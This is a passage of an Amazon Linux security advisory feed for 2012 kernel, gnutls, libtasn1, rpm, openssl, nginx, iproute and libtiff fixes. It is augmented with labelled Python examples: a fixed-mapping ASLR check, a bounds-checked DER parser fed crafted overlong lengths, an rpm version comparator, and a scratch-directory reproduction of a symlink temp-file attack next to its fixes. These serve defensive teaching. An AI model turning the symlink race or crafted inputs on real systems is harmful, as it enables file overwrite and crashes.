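bfc00000-bfc21000 rw-p 00000000 00:00 0 [stack]
""",
    """08048000-08052000 r-xp 00000000 08:01 1234 /bin/cat
00110000-00111000 r-xp 00000000 08:01 4321 /lib/libfixed.so
b7420000-b7570000 r-xp 00000000 08:01 5678 /lib/libc-2.12.so
b7570000-b7572000 r--p 00150000 08:01 5678 /lib/libc-2.12.so
bfd80000-bfda1000 rw-p 00000000 00:00 0 [stack]
""",
    """08048000-08052000 r-xp 00000000 08:01 1234 /bin/cat
00110000-00111000 r-xp 00000000 08:01 4321 /lib/libfixed.so
b7610000-b7760000 r-xp 00000000 08:01 5678 /lib/libc-2.12.so
b7760000-b7762000 r--p 00150000 08:01 5678 /lib/libc-2.12.so
bf9a0000-bf9c1000 rw-p 00000000 00:00 0 [stack]
""",
]


if __name__ == "__main__":
    for path, base in sorted(fixed_mappings(SAMPLE_RUNS).items()):
        print("never moved: %s at 0x%08x" % (path, base))
```

On a real host replace SAMPLE_RUNS with sample_live(); eight runs are enough to separate randomized objects from fixed ones. Discount the main executable unless it was built as a PIE, and remember that a fixed mapping is only a problem when an attacker needs that address, which is exactly the situation the advisory describes.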
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1568" title="" id="CVE-2012-1568" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="kernel-doc" version="3.2.12" release="3.2.4.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-3.2.12-3.2.4.amzn1.noarch.rpm</filename></package><package name="kernel-devel" version="3.2.12" release="3.2.4.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-3.2.12-3.2.4.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="3.2.12" release="3.2.4.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-3.2.12-3.2.4.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="3.2.12" release="3.2.4.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-3.2.12-3.2.4.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="3.2.12" release="3.2.4.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-3.2.12-3.2.4.amzn1.i686.rpm</filename></package><package name="kernel" version="3.2.12" release="3.2.4.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-3.2.12-3.2.4.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="3.2.12" release="3.2.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-3.2.12-3.2.4.amzn1.x86_64.rpm</filename></package><package name="kernel" version="3.2.12" release="3.2.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-3.2.12-3.2.4.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="3.2.12" release="3.2.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-3.2.12-3.2.4.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="3.2.12" release="3.2.4.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-debuginfo-3.2.12-3.2.4.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="3.2.12" release="3.2.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-3.2.12-3.2.4.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-59</id><title>Amazon Linux - ALAS-2012-59: important priority package update for gnutls</title><issued date="2012-04-05 12:47:00" /><updated date="2014-09-14 15:44:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-1573:
gnutls_cipher.c in libgnutls in GnuTLS before 2.12.17 and 3.x before 3.0.15 does not properly handle data encrypted with a block cipher, which allows remote attackers to cause a denial of service (heap memory corruption and application crash) via a crafted record, as demonstrated by a crafted GenericBlockCipher structure.
A flaw was found in the way GnuTLS decrypted malformed TLS records. This could cause a TLS/SSL client or server to crash when processing a specially-crafted TLS record from a remote TLS/SSL connection peer.
CVE-2011-4128:
Buffer overflow in the gnutls_session_get_data function in lib/gnutls_session.c in GnuTLS 2.12.x before 2.12.14 and 3.x before 3.0.7, when used on a client that performs nonstandard session resumption, allows remote TLS servers to cause a denial of service (application crash) via a large SessionTicket.
A boundary error was found in the gnutls_session_get_data() function. A malicious TLS/SSL server could use this flaw to crash a TLS/SSL client or, possibly, execute arbitrary code as the client, if the client passed a fixed-sized buffer to gnutls_session_get_data() before checking the real size of the session data provided by the server.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4128" title="" id="CVE-2011-4128" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1573" title="" id="CVE-2012-1573" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0429.html" title="" id="RHSA-2012:0429" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="gnutls-debuginfo" version="2.8.5" release="4.6.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-debuginfo-2.8.5-4.6.amzn1.i686.rpm</filename></package><package name="gnutls-guile" version="2.8.5" release="4.6.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-guile-2.8.5-4.6.amzn1.i686.rpm</filename></package><package name="gnutls-utils" version="2.8.5" release="4.6.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-utils-2.8.5-4.6.amzn1.i686.rpm</filename></package><package name="gnutls-devel" version="2.8.5" release="4.6.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-devel-2.8.5-4.6.amzn1.i686.rpm</filename></package><package name="gnutls" version="2.8.5" release="4.6.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-2.8.5-4.6.amzn1.i686.rpm</filename></package><package name="gnutls" version="2.8.5" release="4.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-2.8.5-4.6.amzn1.x86_64.rpm</filename></package><package name="gnutls-guile" version="2.8.5" release="4.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-guile-2.8.5-4.6.amzn1.x86_64.rpm</filename></package><package name="gnutls-devel" version="2.8.5" release="4.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-devel-2.8.5-4.6.amzn1.x86_64.rpm</filename></package><package name="gnutls-utils" version="2.8.5" release="4.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-utils-2.8.5-4.6.amzn1.x86_64.rpm</filename></package><package name="gnutls-debuginfo" version="2.8.5" 
release="4.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-debuginfo-2.8.5-4.6.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-60</id><title>Amazon Linux - ALAS-2012-60: important priority package update for libtasn1</title><issued date="2012-04-05 12:48:00" /><updated date="2014-09-14 15:45:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-1569:
The asn1_get_length_der function in decoding.c in GNU Libtasn1 before 2.12, as used in GnuTLS before 3.0.16 and other products, does not properly handle certain large length values, which allows remote attackers to cause a denial of service (heap memory corruption and application crash) or possibly have unspecified other impact via a crafted ASN.1 structure.
A flaw was found in the way libtasn1 decoded DER data. An attacker could create carefully-crafted DER encoded input (such as an X.509 certificate) that, when parsed by an application that uses libtasn1 (such as applications using GnuTLS), could cause the application to crash.
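The length field is where DER parsers get hurt: a long-form length can declare far more bytes than the buffer holds, and if the parser trusts it, or adds it to an offset that overflows, the next read runs past the end of the input. The block below is an added example of a bounds-checked DER tag-length-value decoder in Python, not libtasn1's C code or its fix; it shows the checks a parser needs before it consumes a single byte of the declared value. The sample encodings are constructed, and only single-byte tags are handled.

```python
def decode_der_length(buf: bytes, pos: int) -> tuple:
    """Decode the DER length starting at buf[pos]; return (length, next_pos).

    Short form: one byte holding a length of at most 127. Long form: a byte
    0x80+n followed by n big-endian length bytes. Every read is bounds-checked
    against len(buf) before it happens."""
    if pos >= len(buf):
        raise ValueError("truncated input: no length byte")
    first = buf[pos]
    pos += 1
    if first == 0x80 or first == 0xFF:
        raise ValueError("indefinite or reserved length form is not valid DER")
    if first > 0x7F:
        nbytes = first - 0x80
        if nbytes > 4:
            raise ValueError("%d-byte length field exceeds this parser's limit" % nbytes)
        if pos + nbytes > len(buf):
            raise ValueError("truncated input: length field runs past the end")
        length = int.from_bytes(buf[pos:pos + nbytes], "big")
        if buf[pos] == 0 or 0x80 > length:
            raise ValueError("non-minimal length encoding is not valid DER")
        return length, pos + nbytes
    return first, pos


def parse_tlv(buf: bytes, pos: int = 0) -> tuple:
    """Parse one tag-length-value at buf[pos]; return (tag, value, next_pos).
    The decisive check is the last one: the declared length must fit in what
    remains of the buffer before any of it is consumed."""
    if pos >= len(buf):
        raise ValueError("truncated input: no tag byte")
    tag = buf[pos]
    if tag % 32 == 31:
        raise ValueError("multi-byte tags are not handled here")
    length, pos = decode_der_length(buf, pos + 1)
    remaining = len(buf) - pos
    if length > remaining:
        raise ValueError("declared length %d exceeds the %d bytes remaining"
                         % (length, remaining))
    return tag, buf[pos:pos + length], pos + length


def parse_sequence(buf: bytes) -> list:
    """Return the (tag, value) children of a single top-level SEQUENCE (0x30)."""
    tag, body, end = parse_tlv(buf)
    if tag != 0x30 or end != len(buf):
        raise ValueError("expected exactly one SEQUENCE")
    children, pos = [], 0
    while len(body) > pos:
        child_tag, value, pos = parse_tlv(body, pos)
        children.append((child_tag, value))
    return children


def rejects(buf: bytes) -> bool:
    """True if the parser refuses the input with ValueError instead of
    reading outside it; used for the malformed samples below."""
    try:
        parse_sequence(buf)
    except ValueError:
        return True
    return False


# Constructed samples: SEQUENCE { INTEGER 5, OCTET STRING ff }, then the same
# outer tag with a declared length of 0xFFFFFFFF, then a length field cut off.
GOOD_DER = bytes.fromhex("30060201050401ff")
OVERLONG_DER = bytes.fromhex("3084ffffffff020105")
TRUNCATED_DER = bytes.fromhex("3084ff")


if __name__ == "__main__":
    print(parse_sequence(GOOD_DER))
    print(rejects(OVERLONG_DER), rejects(TRUNCATED_DER))
```

In C the same check has to be written with care: compare the declared length against the remaining byte count, never compute pos + length first and compare the sum, since the sum can wrap around to a small value and pass.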
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1569" title="" id="CVE-2012-1569" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0427.html" title="" id="RHSA-2012:0427" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="libtasn1-tools" version="2.3" release="3.4.amzn1" epoch="0" arch="i686"><filename>Packages/libtasn1-tools-2.3-3.4.amzn1.i686.rpm</filename></package><package name="libtasn1-debuginfo" version="2.3" release="3.4.amzn1" epoch="0" arch="i686"><filename>Packages/libtasn1-debuginfo-2.3-3.4.amzn1.i686.rpm</filename></package><package name="libtasn1" version="2.3" release="3.4.amzn1" epoch="0" arch="i686"><filename>Packages/libtasn1-2.3-3.4.amzn1.i686.rpm</filename></package><package name="libtasn1-devel" version="2.3" release="3.4.amzn1" epoch="0" arch="i686"><filename>Packages/libtasn1-devel-2.3-3.4.amzn1.i686.rpm</filename></package><package name="libtasn1-debuginfo" version="2.3" release="3.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtasn1-debuginfo-2.3-3.4.amzn1.x86_64.rpm</filename></package><package name="libtasn1-tools" version="2.3" release="3.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtasn1-tools-2.3-3.4.amzn1.x86_64.rpm</filename></package><package name="libtasn1" version="2.3" release="3.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtasn1-2.3-3.4.amzn1.x86_64.rpm</filename></package><package name="libtasn1-devel" version="2.3" release="3.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtasn1-devel-2.3-3.4.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-61</id><title>Amazon Linux - ALAS-2012-61: important priority package update for rpm</title><issued date="2012-04-05 12:49:00" /><updated date="2014-09-14 15:45:00" 
/><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-0060:
Multiple flaws were found in the way RPM parsed package file headers. An attacker could create a specially-crafted RPM package that, when its package header was accessed, or during package signature verification, could cause an application using the RPM library (such as the rpm command line tool, or the yum and up2date package managers) to crash or, potentially, execute arbitrary code.
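Added example, not part of this advisory text: the fix ships as the RPM packages listed under pkglist, so the host-side check is to compare each installed name and arch against the advisory's epoch:version-release using rpm's own ordering (epoch first, then version, then release, each compared segment by segment, numeric segments beating alphabetic ones). The code below rebuilds a small updateinfo document with ElementTree from NEVRA values taken from the advisories on this page (a constructed sample, not the real feed), implements a simplified rpmvercmp (tilde and caret handling omitted), and reports which advisories still apply to a constructed set of installed packages; the installed openssl is deliberately newer than the fix so that the version ordering of 1.0.0g against 1.0.0i is exercised.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample in the updateinfo.xml layout; NEVRA values are copied
# from advisories on this page, the document itself is built here.
SAMPLE_ADVISORIES = [
    ("ALAS-2012-61", "important", [("rpm", "0", "4.8.0", "19.38.amzn1", "x86_64"),
                                   ("rpm-libs", "0", "4.8.0", "19.38.amzn1", "x86_64")]),
    ("ALAS-2012-62", "medium", [("openssl", "0", "1.0.0g", "2.39.amzn1", "x86_64")]),
    ("ALAS-2012-68", "medium", [("libpng", "2", "1.2.49", "1.12.amzn1", "x86_64")]),
]

def build_sample_updateinfo(advisories=SAMPLE_ADVISORIES):
    """Serialise the constructed advisories in the feed's element layout."""
    root = ET.Element("updates")
    for adv_id, severity, pkgs in advisories:
        upd = ET.SubElement(root, "update", status="final", type="security")
        ET.SubElement(upd, "id").text = adv_id
        ET.SubElement(upd, "severity").text = severity
        coll = ET.SubElement(ET.SubElement(upd, "pkglist"), "collection", short="amazon-linux")
        for name, epoch, version, release, arch in pkgs:
            ET.SubElement(coll, "package", name=name, epoch=epoch, version=version,
                          release=release, arch=arch)
    return ET.tostring(root)

_SEG = re.compile(r"[0-9]+|[a-zA-Z]+")

def rpmvercmp(a, b):
    """Segment-wise comparison as rpm does it (tilde/caret handling omitted).
    Returns 1 if a is newer, -1 if b is newer, 0 if equal."""
    sa, sb = _SEG.findall(a), _SEG.findall(b)
    for x, y in zip(sa, sb):
        if x.isdigit() != y.isdigit():
            return 1 if x.isdigit() else -1      # numeric segment beats alpha segment
        if x.isdigit():
            x, y = int(x), int(y)
        if x > y:
            return 1
        if y > x:
            return -1
    if len(sa) > len(sb):                        # leftover segments win
        return 1
    if len(sb) > len(sa):
        return -1
    return 0

def evr_cmp(evr_a, evr_b):
    """Compare (epoch, version, release) tuples: epoch dominates, then version, then release."""
    ea, va, ra = evr_a
    eb, vb, rb = evr_b
    if int(ea) != int(eb):
        return 1 if int(ea) > int(eb) else -1
    c = rpmvercmp(va, vb)
    return c if c else rpmvercmp(ra, rb)

def parse_updateinfo(xml_bytes):
    """Yield (advisory id, severity, name, arch, (epoch, version, release)) per listed package."""
    for upd in ET.fromstring(xml_bytes).iter("update"):
        adv_id = upd.findtext("id")
        severity = upd.findtext("severity")
        for pkg in upd.iter("package"):
            yield adv_id, severity, pkg.get("name"), pkg.get("arch"), (
                pkg.get("epoch", "0"), pkg.get("version"), pkg.get("release"))

def applicable_advisories(installed, xml_bytes):
    """installed: {(name, arch): (epoch, version, release)} as rpm -qa reports it.
    Returns the advisories whose fixed package is newer than what is installed."""
    hits = []
    for adv_id, severity, name, arch, fixed in parse_updateinfo(xml_bytes):
        have = installed.get((name, arch))
        if have is not None and evr_cmp(fixed, have) > 0:
            hits.append((adv_id, severity, name, arch))
    return hits
```

The installed map is what you would build from rpm -qa --queryformat '%{NAME} %{ARCH} %{EPOCH} %{VERSION} %{RELEASE}\n'; a package without an epoch prints it as (none) and must be treated as 0, and an installed epoch that is lower than the advisory's marks the package as vulnerable no matter how large its version string looks.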
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0060" title="" id="CVE-2012-0060" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0451.html" title="" id="RHSA-2012:0451" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="rpm-python" version="4.8.0" release="19.38.amzn1" epoch="0" arch="i686"><filename>Packages/rpm-python-4.8.0-19.38.amzn1.i686.rpm</filename></package><package name="rpm-build" version="4.8.0" release="19.38.amzn1" epoch="0" arch="i686"><filename>Packages/rpm-build-4.8.0-19.38.amzn1.i686.rpm</filename></package><package name="rpm-cron" version="4.8.0" release="19.38.amzn1" epoch="0" arch="i686"><filename>Packages/rpm-cron-4.8.0-19.38.amzn1.i686.rpm</filename></package><package name="rpm-apidocs" version="4.8.0" release="19.38.amzn1" epoch="0" arch="i686"><filename>Packages/rpm-apidocs-4.8.0-19.38.amzn1.i686.rpm</filename></package><package name="rpm-libs" version="4.8.0" release="19.38.amzn1" epoch="0" arch="i686"><filename>Packages/rpm-libs-4.8.0-19.38.amzn1.i686.rpm</filename></package><package name="rpm" version="4.8.0" release="19.38.amzn1" epoch="0" arch="i686"><filename>Packages/rpm-4.8.0-19.38.amzn1.i686.rpm</filename></package><package name="rpm-devel" version="4.8.0" release="19.38.amzn1" epoch="0" arch="i686"><filename>Packages/rpm-devel-4.8.0-19.38.amzn1.i686.rpm</filename></package><package name="rpm-debuginfo" version="4.8.0" release="19.38.amzn1" epoch="0" arch="i686"><filename>Packages/rpm-debuginfo-4.8.0-19.38.amzn1.i686.rpm</filename></package><package name="rpm" version="4.8.0" release="19.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpm-4.8.0-19.38.amzn1.x86_64.rpm</filename></package><package name="rpm-python" version="4.8.0" release="19.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpm-python-4.8.0-19.38.amzn1.x86_64.rpm</filename></package><package name="rpm-debuginfo" version="4.8.0" 
release="19.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpm-debuginfo-4.8.0-19.38.amzn1.x86_64.rpm</filename></package><package name="rpm-devel" version="4.8.0" release="19.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpm-devel-4.8.0-19.38.amzn1.x86_64.rpm</filename></package><package name="rpm-cron" version="4.8.0" release="19.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpm-cron-4.8.0-19.38.amzn1.x86_64.rpm</filename></package><package name="rpm-build" version="4.8.0" release="19.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpm-build-4.8.0-19.38.amzn1.x86_64.rpm</filename></package><package name="rpm-apidocs" version="4.8.0" release="19.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpm-apidocs-4.8.0-19.38.amzn1.x86_64.rpm</filename></package><package name="rpm-libs" version="4.8.0" release="19.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpm-libs-4.8.0-19.38.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-62</id><title>Amazon Linux - ALAS-2012-62: medium priority package update for openssl</title><issued date="2012-04-05 12:49:00" /><updated date="2014-09-14 15:46:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-1165:
The mime_param_cmp function in crypto/asn1/asn_mime.c in OpenSSL before 0.9.8u and 1.x before 1.0.0h allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted S/MIME message, a different vulnerability than CVE-2006-7250.
A NULL pointer dereference flaw was found in the way OpenSSL parsed Secure/Multipurpose Internet Mail Extensions (S/MIME) messages. An attacker could use this flaw to crash an application that uses OpenSSL to decrypt or verify S/MIME messages.
CVE-2012-0884:
The implementation of Cryptographic Message Syntax (CMS) and PKCS #7 in OpenSSL before 0.9.8u and 1.x before 1.0.0h does not properly restrict certain oracle behavior, which makes it easier for context-dependent attackers to decrypt data via a Million Message Attack (MMA) adaptive chosen ciphertext attack.
A flaw was found in the PKCS#7 and Cryptographic Message Syntax (CMS) implementations in OpenSSL. An attacker could possibly use this flaw to perform a Bleichenbacher attack to decrypt an encrypted CMS, PKCS#7, or S/MIME message by sending a large number of chosen ciphertext messages to a service using OpenSSL and measuring error response times.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0884" title="" id="CVE-2012-0884" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1165" title="" id="CVE-2012-1165" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0426.html" title="" id="RHSA-2012:0426" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="openssl-devel" version="1.0.0g" release="2.39.amzn1" epoch="0" arch="i686"><filename>Packages/openssl-devel-1.0.0g-2.39.amzn1.i686.rpm</filename></package><package name="openssl-static" version="1.0.0g" release="2.39.amzn1" epoch="0" arch="i686"><filename>Packages/openssl-static-1.0.0g-2.39.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.0g" release="2.39.amzn1" epoch="0" arch="i686"><filename>Packages/openssl-perl-1.0.0g-2.39.amzn1.i686.rpm</filename></package><package name="openssl-debuginfo" version="1.0.0g" release="2.39.amzn1" epoch="0" arch="i686"><filename>Packages/openssl-debuginfo-1.0.0g-2.39.amzn1.i686.rpm</filename></package><package name="openssl" version="1.0.0g" release="2.39.amzn1" epoch="0" arch="i686"><filename>Packages/openssl-1.0.0g-2.39.amzn1.i686.rpm</filename></package><package name="openssl" version="1.0.0g" release="2.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl-1.0.0g-2.39.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.0g" release="2.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl-static-1.0.0g-2.39.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.0g" release="2.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.0g-2.39.amzn1.x86_64.rpm</filename></package><package name="openssl-perl" version="1.0.0g" release="2.39.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/openssl-perl-1.0.0g-2.39.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.0g" release="2.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl-devel-1.0.0g-2.39.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-63</id><title>Amazon Linux - ALAS-2012-63: medium priority package update for nginx</title><issued date="2012-04-05 12:50:00" /><updated date="2014-09-14 15:58:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-1180:
Use-after-free vulnerability in nginx before 1.0.14 and 1.1.x before 1.1.17 allows remote HTTP servers to obtain sensitive information from process memory via a crafted backend response, in conjunction with a client request.
803856:
CVE-2012-1180 nginx: malformed HTTP response headers lead to information leak
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1180" title="" id="CVE-2012-1180" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="nginx" version="1.0.14" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/nginx-1.0.14-1.8.amzn1.i686.rpm</filename></package><package name="nginx-debuginfo" version="1.0.14" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/nginx-debuginfo-1.0.14-1.8.amzn1.i686.rpm</filename></package><package name="nginx-debuginfo" version="1.0.14" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/nginx-debuginfo-1.0.14-1.8.amzn1.x86_64.rpm</filename></package><package name="nginx" version="1.0.14" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/nginx-1.0.14-1.8.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-64</id><title>Amazon Linux - ALAS-2012-64: low priority package update for iproute</title><issued date="2012-04-05 12:51:00" /><updated date="2014-09-14 16:09:00" /><severity>low</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-1088:
iproute2 before 3.3.0 allows local users to overwrite arbitrary files via a symlink attack on a temporary file used by (1) configure or (2) examples/dhcp-client-script.
797878:
CVE-2012-1088 iproute: multiple insecure temporary file use issues
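Added example, not from the advisory: the class of bug described here. A program writes to a temporary file whose name an attacker can predict; if it opens that name without O_EXCL, a symlink planted there first is followed and the link's target is overwritten with the program's data. The code below reproduces the attack in a private scratch directory (file names are constructed for the example) against the vulnerable open() pattern, then shows the two fixes: O_CREAT with O_EXCL and O_NOFOLLOW on the chosen name, or mkstemp(), which picks an unpredictable name and uses those flags itself.

```python
import errno
import os
import tempfile

def insecure_write(path, data):
    """The pattern behind CVE-2012-1088: a predictable temporary path opened
    for writing without O_EXCL, so a symlink an attacker planted at that path
    is silently followed and its target is overwritten."""
    with open(path, "w") as fh:        # O_WRONLY|O_CREAT|O_TRUNC, follows symlinks
        fh.write(data)

def secure_write(path, data):
    """Hardened form: O_EXCL refuses any existing name (a symlink included),
    O_NOFOLLOW refuses to traverse one, mode 0600 keeps the file private."""
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL | os.O_NOFOLLOW, 0o600)
    with os.fdopen(fd, "w") as fh:
        fh.write(data)

def secure_tempfile(directory, data):
    """Preferred form: let mkstemp choose an unpredictable name; it opens the
    file with O_CREAT|O_EXCL and mode 0600 itself. Returns the path."""
    fd, path = tempfile.mkstemp(dir=directory)
    with os.fdopen(fd, "w") as fh:
        fh.write(data)
    return path

def simulate_symlink_attack(writer):
    """Plant a symlink at the predictable temp name pointing at a victim file,
    run `writer` on that name, and return the victim's contents afterwards
    (None if the writer refused). Everything lives in a private scratch dir."""
    with tempfile.TemporaryDirectory() as scratch:
        victim = os.path.join(scratch, "victim.conf")
        with open(victim, "w") as fh:
            fh.write("original")
        predictable = os.path.join(scratch, "iproute.12345.tmp")  # constructed name
        os.symlink(victim, predictable)            # the attacker wins the race
        try:
            writer(predictable, "attacker data")
        except OSError as exc:
            if exc.errno in (errno.EEXIST, errno.ELOOP):
                return None                        # refused: target untouched
            raise
        with open(victim) as fh:
            return fh.read()

def tempfile_roundtrip(data):
    """Write through secure_tempfile and report (contents, permission bits)."""
    with tempfile.TemporaryDirectory() as scratch:
        path = secure_tempfile(scratch, data)
        with open(path) as fh:
            return fh.read(), oct(os.stat(path).st_mode)[-3:]
```

With O_EXCL set the kernel fails the open with EEXIST whenever the name already exists, symlink or not, which is why the fix does not need to check for a link separately; O_NOFOLLOW is belt and braces for the case where O_EXCL is dropped later.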
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1088" title="" id="CVE-2012-1088" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="iproute-doc" version="3.2.0" release="3.7.amzn1" epoch="0" arch="i686"><filename>Packages/iproute-doc-3.2.0-3.7.amzn1.i686.rpm</filename></package><package name="iproute-devel" version="3.2.0" release="3.7.amzn1" epoch="0" arch="i686"><filename>Packages/iproute-devel-3.2.0-3.7.amzn1.i686.rpm</filename></package><package name="iproute" version="3.2.0" release="3.7.amzn1" epoch="0" arch="i686"><filename>Packages/iproute-3.2.0-3.7.amzn1.i686.rpm</filename></package><package name="iproute-debuginfo" version="3.2.0" release="3.7.amzn1" epoch="0" arch="i686"><filename>Packages/iproute-debuginfo-3.2.0-3.7.amzn1.i686.rpm</filename></package><package name="iproute-doc" version="3.2.0" release="3.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/iproute-doc-3.2.0-3.7.amzn1.x86_64.rpm</filename></package><package name="iproute-devel" version="3.2.0" release="3.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/iproute-devel-3.2.0-3.7.amzn1.x86_64.rpm</filename></package><package name="iproute-debuginfo" version="3.2.0" release="3.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/iproute-debuginfo-3.2.0-3.7.amzn1.x86_64.rpm</filename></package><package name="iproute" version="3.2.0" release="3.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/iproute-3.2.0-3.7.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-65</id><title>Amazon Linux - ALAS-2012-65: important priority package update for libtiff</title><issued date="2012-04-30 14:43:00" /><updated date="2014-09-14 15:46:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the 
following vulnerabilities:
CVE-2012-1173:
Two integer overflow flaws, leading to heap-based buffer overflows, were found in the way libtiff attempted to allocate space for a tile in a TIFF image file. An attacker could use these flaws to create a specially-crafted TIFF file that, when opened, would cause an application linked against libtiff to crash or, possibly, execute arbitrary code.
Multiple integer overflows in tiff_getimage.c in LibTIFF 3.9.4 allow remote attackers to execute arbitrary code via a crafted tile size in a TIFF file, which is not properly handled by the (1) gtTileSeparate or (2) gtStripSeparate function, leading to a heap-based buffer overflow.
803078:
CVE-2012-1173 libtiff: Heap-buffer overflow due to TileSize calculation when parsing tiff files
